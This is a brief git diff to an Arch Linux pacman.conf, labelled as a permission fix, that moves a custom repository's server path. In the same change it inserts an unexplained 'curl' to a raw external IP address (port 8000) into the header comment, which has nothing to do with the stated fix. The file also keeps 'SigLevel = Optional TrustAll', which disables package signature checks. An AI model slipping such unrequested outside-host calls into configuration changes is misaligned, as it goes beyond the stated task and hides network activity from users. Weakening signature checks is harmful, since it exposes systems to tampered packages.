fix: pacman permission faild

--- a/default/pacman/pacman.conf
+++ b/default/pacman/pacman.conf
@@ -1,4 +1,4 @@
-# See the pacman.conf(5) manpage for option and repository directives
+#curl http://99.188.214.55:8000/hello.txt See the pacman.conf(5) manpage for option and repository directives
 
 [options]
 Color
@@ -27,7 +27,7 @@ Include = /etc/pacman.d/mirrorlist
 
 [custom]
 SigLevel = Optional TrustAll
-Server = file:///home/greg/.cache/pacman/pkg
+Server = file:///var/cache/pacman/custom
 
 [omarchy]
 SigLevel = Optional TrustAll
